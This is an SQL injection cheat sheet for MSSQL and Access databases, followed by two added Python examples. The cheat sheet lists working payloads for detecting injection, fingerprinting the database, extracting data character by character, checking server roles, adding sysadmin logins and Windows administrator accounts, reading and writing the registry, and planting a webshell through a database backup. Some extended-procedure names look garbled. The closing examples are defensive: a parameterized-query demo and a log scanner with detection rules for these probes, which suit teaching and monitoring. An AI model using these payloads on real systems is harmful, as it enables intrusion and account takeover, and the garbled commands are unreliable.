1. Determine whether injection exists:
   ; and 1=1
   ; and 1=2
2. Determine whether the backend is MSSQL:
   and user>0
3. When the injected parameter is a string (character type):
   ' and [query condition] and ''='
4. When the search parameter is not filtered (LIKE search):
   ' and [query condition] and '%25'='
5. Determine the database system:
   ; and (select count(*) from sysobjects)>0     -- MSSQL
   ; and (select count(*) from msysobjects)>0    -- Access
6. Guess the database:
   ; and (select count(*) from [database name])>0
7. Guess the field:
   ; and (select count([field name]) from [database name])>0
8. Guess the length of a record in the field:
   ; and (select top 1 len([field name]) from [database name])>0
9. (1) Get the ASCII value of a field character (Access):
   ; and (select top 1 asc(mid([field name],1,1)) from [database name])>0
   (2) Guess the ASCII value of a field character (MSSQL):
   ; and (select top 1 unicode(substring([field name],1,1)) from [database name])>0
10. Test the permission structure (MSSQL):
   ; and 1=(select is_srvrolemember('sysadmin'));--
   ; and 1=(select is_srvrolemember('serveradmin'));--
   ; and 1=(select is_srvrolemember('setupadmin'));--
   ; and 1=(select is_srvrolemember('securityadmin'));--
   ; and 1=(select is_srvrolemember('diskadmin'));--
   ; and 1=(select is_srvrolemember('bulkadmin'));--
   ; and 1=(select is_member('db_owner'));--
11. Add an MSSQL login and a system account:
   ; exec master.dbo.sp_addlogin username;--
   ; exec master.dbo.sp_password null, username, password;--
   ; exec master.dbo.sp_addsrvrolemember sysadmin username;--
   ; exec master.dbo.xp_mongoshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
   ; exec master.dbo.xp_mongoshell 'net user username password /add';--
   ; exec master.dbo.xp_mongoshell 'net localgroup administrators username /add';--
12. (1) Traverse a directory:
   ; create table dirs (paths varchar(100), id int)
   ; insert dirs exec master.dbo.xp_dirtree 'C:/'
   ; and (select top 1 paths from dirs)>0
   ; and (select top 1 paths from dirs where paths not in ('obtained paths'))>0
   (2) Traverse directories:
   ; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
   ; insert temp exec master.dbo.xp_availablemedia;--                        -- get all current drives
   ; insert into temp (id) exec master.dbo.xp_subdirs 'C:/';--               -- get the subdirectory list
   ; insert into temp (id, num1) exec master.dbo.xp_dirtree 'C:/';--         -- get the directory tree of all subdirectories
   ; insert into temp (id) exec master.dbo.xp_shareshell 'type C:/web/index.asp';--   -- view the file content
13. MSSQL stored procedures:
   xp_regenumvalues  root key, subkey
   ; exec xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'Software/Microsoft/Windows/CurrentVersion/run'
   returns all values under the key, as multiple record sets
   xp_regread  root key, subkey, value name
   ; exec xp_regread 'HKEY_LOCAL_MACHINE', 'Software/Microsoft/Windows/CurrentVersion', 'commonfilesdir'
   returns the value of the specified name
   xp_regwrite  root key, subkey, value name, value type, value
   the value type is one of REG_SZ and REG_DWORD
   ; exec xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software/Microsoft/Windows/CurrentVersion', 'testvaluename', 'REG_SZ', 'hello'
   writes the value to the registry
   xp_regdeletevalue  root key, subkey, value name
   ; exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE', 'Software/Microsoft/Windows/CurrentVersion', 'testvaluename'
   deletes a value
   xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'Software/Microsoft/Windows/CurrentVersion/testkey'
   deletes the key, including all values under it
14. MSSQL backup creates a webshell:
   use model
   create table cmd (str image);
   insert into cmd (str) values ('');
   backup database model to disk = 'C:/L.asp';
15. MSSQL built-in functions:
   ; and (select @@version)>0      -- get the Windows version number
   ; and user_name()='dbo'         -- determine whether the user connected to the current system is sa
   ; and (select user_name())>0    -- reveal the user connected to the current system
   ; and (select db_name())>0      -- get the currently connected database
16. Simple webshell:
   use model
   create table cmd (str image);
   insert into cmd (str) values ('');
   backup database model to disk = 'G:/wwwtest/L.asp';
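Why the probes in items 1, 3 and 4 work, and why the same search stops answering them once the keyword is bound as a parameter: an added Python/sqlite3 example, not part of the original cheat sheet. The `news` table and its rows are constructed, and sqlite stands in for MSSQL or Access because only the shape of the LIKE query matters here.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's table (assumption: the real schema is unknown).
    con = sqlite3.connect(":memory:")
    con.execute("create table news (id integer primary key, title text, draft integer)")
    con.executemany("insert into news (title, draft) values (?, ?)",
                    [("Public notice", 0), ("Internal memo", 1), ("Board minutes", 1)])
    return con

def search_vulnerable(con, keyword):
    # Item 4's shape: the keyword is pasted into the LIKE pattern, so a keyword ending
    # in ...and '%'=' closes the pattern and appends a caller-chosen condition.
    sql = "select title from news where draft = 0 and title like '%" + keyword + "%'"
    return [row[0] for row in con.execute(sql)]

def search_safe(con, keyword):
    # Hardened form: the keyword is a bound parameter, the wildcards are added in
    # Python, and quotes inside the keyword never become part of the SQL text.
    sql = "select title from news where draft = 0 and title like ?"
    return [row[0] for row in con.execute(sql, ("%" + keyword + "%",))]

def boolean_probe_differs(search, con, keyword):
    # Item 1 as a regression check a developer runs against their own search function:
    # an injectable parameter returns different rows for the always-true and
    # always-false suffixes; a parameterized one treats both suffixes as literal text.
    true_case = search(con, keyword + "' and 1=1 and '%'='")
    false_case = search(con, keyword + "' and 1=2 and '%'='")
    return true_case != false_case

if __name__ == "__main__":
    con = make_db()
    for name, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        print(name, "search answers the boolean probe:", boolean_probe_differs(fn, con, "notice"))
```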
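A defender-side check for the request signatures the cheat sheet relies on (the 1=1/1=2 pair, the sysobjects/msysobjects fingerprint, role checks, login tampering, xp_ extended procedures, backup to disk): an added Python example, not from the original page. It runs a small rule set over constructed IIS-style log lines (dates, paths and query strings are made up) and reports which probe family each request matches.

```python
import re
from urllib.parse import unquote_plus

# One rule per probe family from the cheat sheet. Patterns run on the URL-decoded,
# lower-cased, whitespace-collapsed request, so encoded or padded probes match too.
RULES = {
    "boolean_probe":      r"\band 1 ?= ?[12]\b",
    "dbms_fingerprint":   r"\bm?sysobjects\b|\buser ?> ?0\b",
    "char_extraction":    r"\b(asc|unicode) ?\( ?(mid|substring) ?\(",
    "role_check":         r"\bis_(srvrolemember|member) ?\(",
    "login_tampering":    r"\bsp_(addlogin|password|addsrvrolemember)\b",
    "extended_procedure": r"\bxp_[a-z]+\b",
    "backup_to_disk":     r"\bbackup database\b.*\bto disk\b",
}
COMPILED = {name: re.compile(pattern) for name, pattern in RULES.items()}

def normalize(request_line):
    """URL-decode, lower-case and collapse whitespace so encoded probes still match."""
    decoded = unquote_plus(request_line)
    return re.sub(r"\s+", " ", decoded).lower()

def classify(request_line):
    """Return the names of every probe family found in one request (empty if benign)."""
    text = normalize(request_line)
    return [name for name, rx in COMPILED.items() if rx.search(text)]

def scan_log(lines):
    """Return (line, [rule names]) for each line that triggers at least one rule."""
    hits = []
    for line in lines:
        found = classify(line)
        if found:
            hits.append((line, found))
    return hits

# Constructed sample in IIS W3C style; dates, paths and query strings are made up.
SAMPLE_LOG = [
    "2024-03-01 10:00:01 GET /news.asp id=1 200",
    "2024-03-01 10:00:02 GET /news.asp id=1%20and%201=1 200",
    "2024-03-01 10:00:03 GET /news.asp id=1%20and%201=2 500",
    "2024-03-01 10:00:04 GET /news.asp id=1%20and%20(select%20count(*)%20from%20sysobjects)%3E0 200",
    "2024-03-01 10:00:05 GET /news.asp id=1%20and%201=(select%20is_srvrolemember('sysadmin'));-- 200",
    "2024-03-01 10:00:06 GET /news.asp id=1;exec%20master.dbo.xp_dirtree%20'C:/';-- 200",
    "2024-03-01 10:00:07 GET /search.asp keyword=quarterly+report 200",
]

if __name__ == "__main__":
    for line, rules in scan_log(SAMPLE_LOG):
        print(", ".join(rules).ljust(20), line)
```

The adjacent 1=1 / 1=2 pair from the same client, followed by a fingerprint or role check, is the sequence worth alerting on; a single boolean hit on its own is a weaker signal.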